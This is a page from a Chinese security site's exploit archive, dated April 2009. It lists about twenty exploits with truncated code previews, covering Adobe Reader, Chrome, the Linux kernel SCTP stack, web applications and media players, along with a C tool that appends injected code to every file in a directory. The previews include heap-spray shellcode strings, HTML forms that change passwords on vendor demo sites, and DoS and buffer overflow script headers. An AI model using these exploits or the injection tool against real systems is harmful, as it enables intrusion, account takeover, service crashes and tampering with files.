首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Google Chrome version 1.0.154.53 "throw exception" remote crash and denial of se
  日期:2009-04-29 09:55:44 点击:71 评论:0
Google Chrome 1.0.154.59 throw exception Memory Corruption Vulnerability. Version Affected: 1.0.154.59 . Previous versions are vulnerable too Description: The Google chrome browser is vulnerable to memory exhaustion based denial of service which can
Adobe Reader javascript getAnnots exploit
  日期:2009-04-29 09:54:21 点击:324 评论:0
//##############//Exploit made by Arr1val//Proved in adobe 9.1 and adobe 8.1.4 on linux////Steps://- create a pdf with an annotation (a note) (i used an annotation with a very long AAAAA name, but that might be omitted)//- attach the following scrip
Adobe Reader javascript this.spell.customDictionaryOpen exploit
  日期:2009-04-29 09:53:44 点击:50 评论:0
//##############//Exploit made by Arr1val//Proved in adobe 9.1 and adobe 8.1.4 on linux//##############var memory;function New_Script(){var nop = unescape(%u9090%u9090);var shellcode = unescape( %uc92b%ue983%ud9eb%ud9ee%u2474%u5bf4%u7381%u1313%u2989
C版本的批量注入代码工具 Inject_Code 1.0
  日期:2009-04-29 09:52:11 点击:262 评论:0
下午和LDY讨论完一个浏览器的bug后,闲来无事,写了一小段代码。linux编译通过,windows下我没试应该也可以。一个C版本的批量注入代码工具。功能:遍历目录、子目录下所有文件,在文件的最后开始注入代码。目录位置,文件后缀名可以自定义。具体细节请查看下面的源代码
webSPELL <= 4.2.0d Local File Disclosure Exploit (.c linux)
  日期:2009-04-29 09:50:34 点击:43 评论:0
/* * webSPELL = 4.2.0d Local File Disclosure Exploit (.c linux) * * by Juri Gianni aka yeat - staker[at]hotmail[dot]it * * Description * ----------- * webSPELL contains one flaw that allows an attacker * to disclose a local file. The issue is due to
VisionLMS 1.0 (changePW.php) Remote Password Change Exploit
  日期:2009-04-29 09:49:18 点击:72 评论:0
html head titleVisionLMS 1.0 | Change Password/title p* VisionLMS 1.0 Remote Password Changebr * Coded by Mr.tro0oqybr * E-mail t.4@windowslive.com ---lt; Yemeni hackerbr * Greetz All my Friendsbr nbsp;/p form enctype=multipart/form-data method=post
Linux Kernel 2.6.x SCTP FWD Memory Corruption Remote Exploit
  日期:2009-04-29 09:47:44 点击:60 评论:0
/* CVE-2009-0065 SCTP FWD Chunk Memory Corruption * Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit * * coded by: sgrakkyu at antifork.org * http://kernelbof.blogspot.com * * * NOTE: you need at least one sctp application bound on the ta
iodined <= 0.4.2 DoS exploit
  日期:2009-04-29 09:46:52 点击:25 评论:0
#!/usr/bin/perl # iodined = 0.4.2 DoS exploit # # by Albert Sellares whats[at]wekk[dot]net # http://www.wekk.net # 2009-04-26 # # This exploit shuts down the iodined daemon using a forged DNS packet. # It works on the last debian stable version (0.4
SDP Downloader version 2.3.0 local heap overflow exploit that creates a maliciou
  日期:2009-04-28 11:02:04 点击:51 评论:0
#!/usr/bin/perl### Found By : Cyber-Zone (ABDELKHALEK) == Proud To Be Figuigian ::Figuig City OwnZ !## MoroCCo 2009## GreatZ To : Hussin X , Jiko , ZoRLu , Mag!c ompo , Stack , b0rizQ ... All MoroCCaN HaCkerS##OllyDBG Registers#EAX 41414141#ECX 00AF
Absolute Form Processor XE-V version 1.5 remote password changing exploit
  日期:2009-04-28 10:59:51 点击:33 评论:0
title Absolute Form Processor XE-V 1.5 Remote Change Pasword /title body bgcolor=#FFFFFF text=#000000 form name=form1 method=post action= http://www.xigla.com/absolutefp/demo/edituser.asp table width=96% border=0 cellspacing=2 cellpadding=2 align=ce
Zervit HTTP Server versions 0.3 and below remote denial of service exploit
  日期:2009-04-28 10:58:44 点击:28 评论:0
#!/usr/bin/perl## Zervit HTTP Server = v0.3 Remote Denial of Service.## --------------------------------------------------------------------# The vulnerability is caused due to an error in multi-socket.# This can be exploited to crash the HTTP servi
Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit
  日期:2009-04-28 10:56:58 点击:29 评论:0
#!/usr/bin/python # _ _ _ __ _ _ _ #| || | (_) ___ / | |__ | | | #| __ | | | (_- | () | | / / |_ _| #|_||_| |_| /__/ __/ |__ |_| # #[*] Usage : belkin.py [victime_ip] #[*] Bug : Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit #[*
Teraway LinkTracker 1.0 Remote Password Change Exploit
  日期:2009-04-28 10:55:52 点击:21 评论:0
titleTeraway LinkTracker V1.0 Remote Password Change/title form name=form1 method=post action= http://www.teraway.com/linktracker/demo/edituser.asp table width=90% border=0 cellspacing=2 cellpadding=2 align=center tr td class=TitlesCod[3]d By ThE g0
ECShop 2.5.0 (order_sn) Remote SQL Injection Vulnerability
  日期:2009-04-28 10:52:58 点击:42 评论:0
######################### Securitylab.ir ######################## # Application Info: # Name: ECSHOP # Version: 2.5.0 # Website: http://www.ecshop.com ################################################################# # Discoverd By: Securitylab.ir #
EZ-Blog Beta2 (category) Remote SQL Injection Vulnerability
  日期:2009-04-28 10:51:56 点击:36 评论:0
*********************************************************************************************** *********************************************************************************************** ** ** ** ** ** [] [] [] [][][][ [] [] [][ ][] [] [][]] []
iodined <= 0.4.2-2 (forged DNS packet) Denial of Service Exploit
  日期:2009-04-28 10:51:08 点击:41 评论:0
#!/usr/bin/perl # iodined = 0.4.2 DoS exploit # # by Albert Sellares whats[at]wekk[dot]net # http://www.wekk.net # 2009-04-26 # # This exploit shuts down the iodined daemon using a forged DNS packet. # It works on the last debian stable version (0.4
LightBlog <= 9.9.2 (register.php) Remote Code Execution Exploit
  日期:2009-04-28 10:42:57 点击:29 评论:0
? /* --------------------------------------------------------------- LightBlog = 9.9.2 (register.php) Remote Code Execution Exploit --------------------------------------------------------------- author...: EgiX mail.....: n0b0d13s[at]gmail[dot]com
Icewarp Merak Mail Server 9.4.1 Base64FileEncode() BOF PoC
  日期:2009-04-28 10:39:13 点击:66 评论:0
?php /* Icewarp Merak Mail Server 9.4.1 IceWarpServer.APIObject/api.dll Base64FileEncode() stack based buffer overflow poc by Nine:Situations:Group::surfista site: http://retrogod.altervista.org/ api.dll contains a stack based buffer overflow in the
Zoom Player Pro v.3.30 .m3u File Buffer Overflow Exploit (seh)
  日期:2009-04-28 10:39:13 点击:25 评论:0
?php /* Zoom Player Pro v.3.30 .m3u file buffer overflow exploit (seh) by Nine:Situations:Group::surfista seems the same of http://secunia.com/advisories/28214/ bug found by Luigi Auriemma no full working exploit out, so I made my test version /* /*
SDP Downloader 2.3.0 (.ASX) Local Buffer Overflow Exploit (SEH) #2 (1796)
  日期:2009-04-28 10:38:10 点击:21 评论:0
/* SDP-BOF.c * SDP Downloader Local Buffer overflow exploit [SEH] * Credits : Cyber-Zone * Exploit BY : * SimO-s0fT ( maroc-anti-connexion@hotmail.com ) * Shoot to : Stack r1z Str0ke * */ #include stdio.h #include string.h #include stdlib.h #define
共637页/12733条记录 首页 上一页 [459] [460] [461] 462 [463] [464] [465] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved